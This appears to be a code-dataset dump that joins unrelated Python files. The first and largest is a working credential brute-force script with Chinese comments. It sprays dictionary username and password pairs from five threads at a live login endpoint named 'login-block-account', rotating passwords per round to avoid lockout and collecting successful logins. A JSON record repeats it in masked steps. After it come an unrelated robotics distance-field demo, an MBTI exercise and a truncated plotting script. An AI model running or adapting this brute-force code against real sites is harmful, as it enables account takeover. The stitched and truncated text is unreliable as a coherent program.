<|reserved_special_token_1|>
import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3 # 爆破的轮数
curr_round = 0 # 当前的轮数
sleep_time = 2 # 每一轮休眠的秒数
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print("[Error] {0}".format(repr(e)))
return
username = login_info[0]
# 如果这个用户名已经被爆破出来密码,那么跳过这个用户名
if username in success_username:
return
password = login_info[1]
# 登录
payload = {
"username": username,
"password": password,
}
print('开始尝试用户名:{},密码:{}'.format(username,password))
# url = "http://127.0.0.1:8000/user/login-block-account/?referer=/"
url = "http://ss.gentlecp.com:40000/user/login-block-account/?referer=/"
r = requests.post(url, data=payload)
# 判断是否登录成功
if r.status_code == 200:
msg = login_info
success_str = "欢迎访问GentleCP的网站"
if success_str in r.text:
# 登录成功则把登录信息保存到success_queue
success_queue.put(msg)
# 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破
success_username.append(username)
print("[INFO] success: ", msg)
# 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处
# stop_brute()
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open("dict/{}".format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
# 每一轮都换下一个密码
p = passwords[curr_round % len(passwords)]
count += 1
pair = (u, p)
dict_queue.put(pair)
print("字典生成完成,长度 {}".format(count))
def get_parse() -> dict:
parser = argparse.ArgumentParser()
parser.add_argument("--username", "-u", help="用户名字典")
parser.add_argument("--password", "-p", help="密码字典")
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print("\n[INFO] 爆破结果: ", success)
if __name__ == "__main__":
args = get_parse()
dict_username = args.get('dict_username', "username.txt")
dict_password = args.get('dict_password', "password.txt")
for curr_round in range(0, MAX_ROUND):
print("[INFO] 开始第{0}轮爆破".format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print("[INFO] Sleep.")
sleep(2)
print_result()
|
flexible
|
{
"blob_id": "94286fc36e06598b9faa65d9e5759f9518e436c6",
"index": 7979,
"step-1": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-3": "<mask token>\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-4": "import argparse\nimport requests\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\nfrom random import choice\nfrom time import sleep\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-5": "import argparse\nimport requests\n\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\n\nfrom random import choice\nfrom time import sleep\n\n\nMAX_ROUND = 3 # 爆破的轮数\ncurr_round = 0 # 当前的轮数\nsleep_time = 2 # 每一轮休眠的秒数\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print(\"[Error] {0}\".format(repr(e)))\n return\n\n username = login_info[0]\n # 如果这个用户名已经被爆破出来密码,那么跳过这个用户名\n if username in success_username:\n return\n\n password = login_info[1]\n # 登录\n payload = {\n \"username\": username,\n \"password\": password,\n }\n print('开始尝试用户名:{},密码:{}'.format(username,password))\n\n # url = \"http://127.0.0.1:8000/user/login-block-account/?referer=/\"\n url = \"http://ss.gentlecp.com:40000/user/login-block-account/?referer=/\"\n r = requests.post(url, data=payload)\n\n # 判断是否登录成功\n if r.status_code == 200:\n msg = login_info\n\n success_str = \"欢迎访问GentleCP的网站\"\n if success_str in r.text:\n # 登录成功则把登录信息保存到success_queue\n success_queue.put(msg)\n # 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破\n success_username.append(username)\n print(\"[INFO] success: \", msg)\n\n # 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处\n # stop_brute()\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open(\"dict/{}\".format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n\n count = 0\n for u in username:\n # 每一轮都换下一个密码\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = (u, p)\n dict_queue.put(pair)\n print(\"字典生成完成,长度 {}\".format(count))\n\n\ndef get_parse() -> dict:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--username\", \"-u\", help=\"用户名字典\")\n parser.add_argument(\"--password\", \"-p\", help=\"密码字典\")\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print(\"\\n[INFO] 爆破结果: \", success)\n\n\nif __name__ == \"__main__\":\n args = get_parse()\n dict_username = args.get('dict_username', \"username.txt\")\n dict_password = args.get('dict_password', \"password.txt\")\n\n for curr_round in range(0, MAX_ROUND):\n print(\"[INFO] 开始第{0}轮爆破\".format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print(\"[INFO] Sleep.\")\n sleep(2)\n\n print_result()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/env python
# Copyright (c) 2018, University of Stuttgart
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright
# notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
# Jim Mainprice on Sunday June 13 2018
import demos_common_imports
from pyrieef.geometry.workspace import *
from pyrieef.geometry.pixel_map import sdf
from pyrieef.rendering.workspace_planar import WorkspaceDrawer
env = EnvBox(dim=np.array([2., 2.]))
box = Box(origin=np.array([-.2, -.2]))
segment = Segment(origin=np.array([.4, -.1]), orientation=0.2)
circle = Circle(origin=np.array([.5, .5]), radius=0.2)
workspace = Workspace(env)
workspace.obstacles.append(box)
workspace.obstacles.append(segment)
workspace.obstacles.append(circle)
# Compute Occupancy map and SDF
nb_points = 20
occupancy_map = occupancy_map(nb_points, workspace)
signed_distance_field = sdf(occupancy_map)
# Setup viewer
viewer = WorkspaceDrawer(workspace, wait_for_keyboard=True)
viewer.draw_ws_img(signed_distance_field)
# viewer.draw_ws_img(occupancy_map)
# import cv2
# Draw blured image
# viewer.draw_ws_img(
# ndimage.gaussian_filter(
# cv2.resize(src=signed_distance_field,
# dsize=(300, 300),
# interpolation=cv2.INTER_NEAREST), sigma=3))
viewer.draw_ws_obstacles()
viewer.show_once()
|
normal
|
{
"blob_id": "0d6177660a9b9c22bcf6eb11763e7fe1ee03b46a",
"index": 3454,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nworkspace.obstacles.append(box)\nworkspace.obstacles.append(segment)\nworkspace.obstacles.append(circle)\n<mask token>\nviewer.draw_ws_img(signed_distance_field)\nviewer.draw_ws_obstacles()\nviewer.show_once()\n",
"step-3": "<mask token>\nenv = EnvBox(dim=np.array([2.0, 2.0]))\nbox = Box(origin=np.array([-0.2, -0.2]))\nsegment = Segment(origin=np.array([0.4, -0.1]), orientation=0.2)\ncircle = Circle(origin=np.array([0.5, 0.5]), radius=0.2)\nworkspace = Workspace(env)\nworkspace.obstacles.append(box)\nworkspace.obstacles.append(segment)\nworkspace.obstacles.append(circle)\nnb_points = 20\noccupancy_map = occupancy_map(nb_points, workspace)\nsigned_distance_field = sdf(occupancy_map)\nviewer = WorkspaceDrawer(workspace, wait_for_keyboard=True)\nviewer.draw_ws_img(signed_distance_field)\nviewer.draw_ws_obstacles()\nviewer.show_once()\n",
"step-4": "import demos_common_imports\nfrom pyrieef.geometry.workspace import *\nfrom pyrieef.geometry.pixel_map import sdf\nfrom pyrieef.rendering.workspace_planar import WorkspaceDrawer\nenv = EnvBox(dim=np.array([2.0, 2.0]))\nbox = Box(origin=np.array([-0.2, -0.2]))\nsegment = Segment(origin=np.array([0.4, -0.1]), orientation=0.2)\ncircle = Circle(origin=np.array([0.5, 0.5]), radius=0.2)\nworkspace = Workspace(env)\nworkspace.obstacles.append(box)\nworkspace.obstacles.append(segment)\nworkspace.obstacles.append(circle)\nnb_points = 20\noccupancy_map = occupancy_map(nb_points, workspace)\nsigned_distance_field = sdf(occupancy_map)\nviewer = WorkspaceDrawer(workspace, wait_for_keyboard=True)\nviewer.draw_ws_img(signed_distance_field)\nviewer.draw_ws_obstacles()\nviewer.show_once()\n",
"step-5": "#!/usr/bin/env python\n\n# Copyright (c) 2018, University of Stuttgart\n# All rights reserved.\n#\n# Permission to use, copy, modify, and distribute this software for any purpose\n# with or without fee is hereby granted, provided that the above copyright\n# notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n#\n# Jim Mainprice on Sunday June 13 2018\n\nimport demos_common_imports\nfrom pyrieef.geometry.workspace import *\nfrom pyrieef.geometry.pixel_map import sdf\nfrom pyrieef.rendering.workspace_planar import WorkspaceDrawer\n\nenv = EnvBox(dim=np.array([2., 2.]))\nbox = Box(origin=np.array([-.2, -.2]))\nsegment = Segment(origin=np.array([.4, -.1]), orientation=0.2)\ncircle = Circle(origin=np.array([.5, .5]), radius=0.2)\nworkspace = Workspace(env)\nworkspace.obstacles.append(box)\nworkspace.obstacles.append(segment)\nworkspace.obstacles.append(circle)\n\n# Compute Occupancy map and SDF\nnb_points = 20\noccupancy_map = occupancy_map(nb_points, workspace)\nsigned_distance_field = sdf(occupancy_map)\n\n# Setup viewer\nviewer = WorkspaceDrawer(workspace, wait_for_keyboard=True)\nviewer.draw_ws_img(signed_distance_field)\n# viewer.draw_ws_img(occupancy_map)\n\n# import cv2\n# Draw blured image\n# viewer.draw_ws_img(\n# ndimage.gaussian_filter(\n# cv2.resize(src=signed_distance_field,\n# dsize=(300, 300),\n# interpolation=cv2.INTER_NEAREST), sigma=3))\n\nviewer.draw_ws_obstacles()\nviewer.show_once()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in yeongil_MBTI:
print(MBTI_reverse_index[i], end='')
<|reserved_special_token_1|>
MBTI_reverse_index = {'E': 'I', 'I': 'E', 'S': 'N', 'N': 'S', 'T': 'F', 'F':
'T', 'J': 'P', 'P': 'J'}
yeongil_MBTI = input()
for i in yeongil_MBTI:
print(MBTI_reverse_index[i], end='')
<|reserved_special_token_1|>
# https://www.acmicpc.net/problem/20540
# 각 지표의 반대되는 지표를 저장한 dictionary
MBTI_reverse_index = {
'E': 'I',
'I': 'E',
'S': 'N',
'N': 'S',
'T': 'F',
'F': 'T',
'J': 'P',
'P': 'J'
}
# 연길이의 MBTI 4글자를 대문자로 입력
yeongil_MBTI = input()
# 연길이 MBTI의 각 지표에 반대되는 지표를 출력
for i in yeongil_MBTI:
print(MBTI_reverse_index[i], end='')
|
flexible
|
{
"blob_id": "c247b218267fc7c2bee93053dd90b2806572eaf2",
"index": 4234,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')\n",
"step-3": "MBTI_reverse_index = {'E': 'I', 'I': 'E', 'S': 'N', 'N': 'S', 'T': 'F', 'F':\n 'T', 'J': 'P', 'P': 'J'}\nyeongil_MBTI = input()\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')\n",
"step-4": "# https://www.acmicpc.net/problem/20540\n\n# 각 지표의 반대되는 지표를 저장한 dictionary\nMBTI_reverse_index = {\n 'E': 'I',\n 'I': 'E',\n 'S': 'N',\n 'N': 'S',\n 'T': 'F',\n 'F': 'T',\n 'J': 'P',\n 'P': 'J'\n}\n\n# 연길이의 MBTI 4글자를 대문자로 입력\nyeongil_MBTI = input()\n\n# 연길이 MBTI의 각 지표에 반대되는 지표를 출력\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# dg_kernel plots
import os
import re
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import csv
import sys
NE_SIZE = 128
TITLE_SIZE = 35
TEXT_SIZE = 30
MARKER_SIZE = 10
LINE_WIDTH = 5
colors = { idx:cname for idx, cname in enumerate(mcolors.cnames) }
eventname = 'L1_DCM'
callstacklevel = 7
FREQ_THRESHOLD = 0.02
ROOT = '/global/homes/g/grnydawn/trepo/temp/cylcworkspace/extrae_HSW/cgroup/folding/02242017_1353/codeline'
# read histogram file
def read_histogram(histofile):
histodict = {}
with open(histofile, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
try:
exclude_item = []
for i, row in enumerate(reader):
if len(row)<1: continue
if i==0:
name = []
for j, item in enumerate(row[1:]):
if len(item)<1:
exclude_item += [ j ]
continue
name += [ item ]
histodict['Head'] = name
else:
numval = []
for j, item in enumerate(row[1:]):
if j in exclude_item: continue
try:
numval += [ float(item) ]
except Exception as e:
if len(item)<1:
numval += [ 0.0 ]
else:
print e
histodict[row[0]] = numval
except csv.Error as e:
sys.exit('file %s, line %d: %s' % (histofile, reader.line_num, e))
return histodict
def draw_histogram(xname, yval, title, xlabel, ylabel, filename, xrange=None):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title(title, fontsize=TITLE_SIZE)
ax.set_xlabel(xlabel, fontsize=TEXT_SIZE)
ax.set_ylabel(ylabel, fontsize=TEXT_SIZE)
if xrange: XL = xrange
else: XL = [0, len(xname)]
ax.set_xticks(range(len(xname)))
newname = []
for i, xn in enumerate(xname):
if i%1==0:
newname += [ xn ]
else:
newname += [ "" ]
ax.set_xticklabels(newname)
xval = np.arange(len(xname))[XL[0]:XL[1]]
yval = yval[XL[0]:XL[1]]
YL = [0, max(yval)*1.5]
ax.axis(XL + YL)
gridlines = ax.get_xaxis().get_gridlines()
for gl in gridlines:
gl.set_visible(False)
ax.grid(b=True, which='major', color='b', linestyle='-', linewidth=0.5)
ax.grid(b=False, which='minor', color='#888888', linestyle='-',linewidth=0.5)
ax.grid(True)
for label in ax.xaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)
#for label in ax.xaxis.get_ticklabels(): label.set_fontsize(20)
for label in ax.yaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)
fnamelist = list(set(filename))
clist = []
for fname in filename:
color = colors[fnamelist.index(fname)]
clist += [ color ]
width = (XL[1]-XL[0])/float(len(xval)*2)
histo = ax.bar(xval-width/2, yval, width, color=clist)
dummy_bars = []
for i, fname in enumerate(fnamelist):
dummy_bars += ax.bar([0], [1.E-16], width, color=colors[i])
ax.legend(dummy_bars, fnamelist, loc=2)
#plt.savefig("./dgomp.png")
plt.show()
peak1 = read_histogram('%s/%s_high_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))
peak2 = read_histogram('%s/%s_high_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))
peaks_avgsum = sum(peak1['Average']) + sum(peak2['Average'])
#print 'peaks_avgsum = ', peaks_avgsum
peaks_normavg = {}
for i, line in enumerate(peak1['Head']):
if peaks_normavg.has_key(line):
peaks_normavg[line] += peak1['Average'][i]
else:
peaks_normavg[line] = peak1['Average'][i]
for i, line in enumerate(peak2['Head']):
if peaks_normavg.has_key(line):
peaks_normavg[line] += peak2['Average'][i]
else:
peaks_normavg[line] = peak2['Average'][i]
#print 'peaks_normavg before = ', peaks_normavg.values()[:30]
for line in peaks_normavg.keys():
peaks_normavg[line] = peaks_normavg[line]/peaks_avgsum
#print 'peaks_normavg after = ', peaks_normavg.values()[:30]
nonpeak1 = read_histogram('%s/%s_low_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))
nonpeak2 = read_histogram('%s/%s_low_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))
nonpeaks_avgsum = sum(nonpeak1['Average']) + sum(nonpeak2['Average'])
nonpeaks_normavg = {}
for i, line in enumerate(nonpeak1['Head']):
if nonpeaks_normavg.has_key(line):
nonpeaks_normavg[line] += nonpeak1['Average'][i]
else:
nonpeaks_normavg[line] = nonpeak1['Average'][i]
for i, line in enumerate(nonpeak2['Head']):
if nonpeaks_normavg.has_key(line):
nonpeaks_normavg[line] += nonpeak2['Average'][i]
else:
nonpeaks_normavg[line] = nonpeak2['Average'][i]
#print 'nonpeaks_normavg before = ', nonpeaks_normavg.values()[:30]
for line in nonpeaks_normavg.keys():
nonpeaks_normavg[line] = nonpeaks_normavg[line]/nonpeaks_avgsum
#print 'nonpeaks_normavg after = ', nonpeaks_normavg.values()[:30]
#import pdb; pdb.set_trace()
result = {}
for line, bursts in peaks_normavg.iteritems():
result[line] = bursts
for line, bursts in nonpeaks_normavg.iteritems():
if result.has_key(line):
result[line] -= bursts
else:
result[line] = -1.0*bursts
xlinenum = []
ybursts = []
filename = []
for line, bursts in result.iteritems():
if bursts>FREQ_THRESHOLD:
match = re.search(r'\s*(\d+)\s+\((.*)\)', line)
if match:
xlinenum += [ match.group(1) ]
ybursts += [ float(bursts) ]
matchfname = re.search(r'(\b\w+\.[cFf][\d]*\,)', match.group(2))
if matchfname is None:
fname = 'Unresolved'
else:
fname = matchfname.group(1)[:-1]
filename += [ fname ]
zipped = zip(xlinenum, ybursts, filename)
zipped.sort()
xlinenum, ybursts, filename = zip(*zipped)
#title = 'Frequent source lines in a region of interest'
title = 'Frequent source lines at high %s regions in callstack level %d'%(eventname, callstacklevel)
xlabel = 'Sampled function line number'
ylabel = 'Normalized frequency'
draw_histogram(xlinenum, np.array(ybursts), title, xlabel, ylabel, filename)
|
normal
|
{
"blob_id": "872b13a93c9aba55c143ee9891543f059c070a36",
"index": 4631,
"step-1": "# dg_kernel plots\n\nimport os\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport csv\nimport sys\n\nNE_SIZE = 128\nTITLE_SIZE = 35 \nTEXT_SIZE = 30 \nMARKER_SIZE = 10\nLINE_WIDTH = 5\ncolors = { idx:cname for idx, cname in enumerate(mcolors.cnames) }\n\neventname = 'L1_DCM'\ncallstacklevel = 7\n\nFREQ_THRESHOLD = 0.02\n\nROOT = '/global/homes/g/grnydawn/trepo/temp/cylcworkspace/extrae_HSW/cgroup/folding/02242017_1353/codeline'\n\n# read histogram file\ndef read_histogram(histofile):\n histodict = {}\n with open(histofile, 'rb') as f:\n reader = csv.reader(f, delimiter='\\t')\n try:\n exclude_item = []\n for i, row in enumerate(reader):\n if len(row)<1: continue\n if i==0:\n name = []\n for j, item in enumerate(row[1:]):\n if len(item)<1:\n exclude_item += [ j ]\n continue\n name += [ item ]\n histodict['Head'] = name\n else:\n numval = []\n for j, item in enumerate(row[1:]):\n if j in exclude_item: continue\n try:\n numval += [ float(item) ]\n except Exception as e:\n if len(item)<1:\n numval += [ 0.0 ]\n else:\n print e\n histodict[row[0]] = numval\n except csv.Error as e:\n sys.exit('file %s, line %d: %s' % (histofile, reader.line_num, e))\n\n return histodict\n\ndef draw_histogram(xname, yval, title, xlabel, ylabel, filename, xrange=None):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n ax.set_title(title, fontsize=TITLE_SIZE)\n ax.set_xlabel(xlabel, fontsize=TEXT_SIZE)\n ax.set_ylabel(ylabel, fontsize=TEXT_SIZE)\n\n if xrange: XL = xrange\n else: XL = [0, len(xname)]\n\n ax.set_xticks(range(len(xname)))\n newname = []\n for i, xn in enumerate(xname):\n if i%1==0:\n newname += [ xn ]\n else:\n newname += [ \"\" ]\n ax.set_xticklabels(newname)\n\n xval = np.arange(len(xname))[XL[0]:XL[1]] \n yval = yval[XL[0]:XL[1]] \n\n YL = [0, max(yval)*1.5]\n ax.axis(XL + YL)\n\n gridlines = ax.get_xaxis().get_gridlines()\n for gl in gridlines:\n gl.set_visible(False)\n\n ax.grid(b=True, which='major', color='b', linestyle='-', linewidth=0.5)\n ax.grid(b=False, which='minor', color='#888888', linestyle='-',linewidth=0.5)\n ax.grid(True)\n\n for label in ax.xaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)\n #for label in ax.xaxis.get_ticklabels(): label.set_fontsize(20)\n for label in ax.yaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)\n\n fnamelist = list(set(filename))\n clist = []\n for fname in filename:\n color = colors[fnamelist.index(fname)]\n clist += [ color ]\n\n width = (XL[1]-XL[0])/float(len(xval)*2)\n histo = ax.bar(xval-width/2, yval, width, color=clist)\n\n dummy_bars = []\n for i, fname in enumerate(fnamelist):\n dummy_bars += ax.bar([0], [1.E-16], width, color=colors[i])\n\n ax.legend(dummy_bars, fnamelist, loc=2)\n #plt.savefig(\"./dgomp.png\")\n plt.show() \n\npeak1 = read_histogram('%s/%s_high_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))\npeak2 = read_histogram('%s/%s_high_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))\n\npeaks_avgsum = sum(peak1['Average']) + sum(peak2['Average'])\n#print 'peaks_avgsum = ', peaks_avgsum\n\npeaks_normavg = {}\n\nfor i, line in 